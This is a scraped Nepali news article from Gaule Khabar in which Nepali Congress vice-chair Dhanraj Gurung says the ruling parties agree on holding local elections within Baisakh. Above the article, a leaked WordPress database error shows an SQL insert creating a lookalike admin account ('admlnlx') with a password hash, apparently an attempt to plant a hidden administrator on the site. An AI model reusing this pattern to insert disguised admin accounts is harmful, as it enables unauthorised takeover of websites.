WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BF24WAsGkhlIAGKVbOI/KPnj4nd4UY0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 06:55:22', '', 'admlnlx', 'admlnlx')

स्थानीय तहको निर्वाचनबारे सत्तारुढ दलबीच सहमति :उपसभापति गुरुङ – Gaule Khabar

स्थानीय तहको निर्वाचनबारे सत्तारुढ दलबीच सहमति :उपसभापति गुरुङ

स्थानीय तहको निर्वाचनबारे सत्तारुढ दलबीच सहमति :उपसभापति गुरुङ

काठमाण्डौ । नेपाली कांग्रेसका उपसभापति धनराज गुरुङ्ले वैशाखभित्र स्थानीय तहको निर्वाचन हुने बताएको छ । आज यहाँ पत्रकारसँग कुराकानी गर्दै उहाँले स्थानीय तहको निर्वाचनको विषयमा सत्तारुढ दलहरुबीच सहमति भइसकेको बताए ।

उनले भने,“सत्तारुढ दलहरुबीच सहमति भइसकेको छ । निर्णय हुन मात्रै बाँकी हो ।” निर्वाचनको विषयमा दुई चार दिनभित्रै निर्णय आउने उनको भनाइ छ । स्थानीय निर्वाचनदेखि आम निर्वाचनसम्म दलहरु गठबन्धन नगरी निर्वाचनमा जाने उहाँले बताउनुभयो ।उनले भने , “वैचारीक कुरा गर्ने हो भने बहुलबादमा आधारित संसदीय पद्धतिमा आ–आफ्नो घोषणा पत्र लिएर निर्वाचनमा जाने हो ।”

उनले राजनीतिक दल आफ्नो एजेन्डा, दृष्टिकोण नीति तथा कार्यक्रम लिएर निर्वाचनमा जानुपर्छ भने ।

पार्टीभित्र फेरि समूहगत राजनीति चलेको भन्ने हल्ला निराधार रहेको उनको भनाइ छ । न्यायोचित व्यवस्थापनको कुरा पार्टीभित्र उठेको भन्दै उहाँले यो वा त्यो समूह भन्ने कुरा नभएको जिकिर गरे । “निर्वाचनमा समूह हो अब होइन” उनले भने । निर्वाचनपछि सबैको साझा सभापति, पदाधिकारी र केन्द्रिय सदस्य रहेको उहाँको भनाइ थियो ।

फरक प्रसङ्गमा बोल्दै उहाँले अहिलेको सरकारले जनताको चाहना अनुसार खोपको व्यवस्थापन गर्न सफल भएको बताए । खोपसँगै अन्य काम पनि जनचाहना अनुसार गर्न सरकारलाई उनले आग्रह गरे । रासस

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका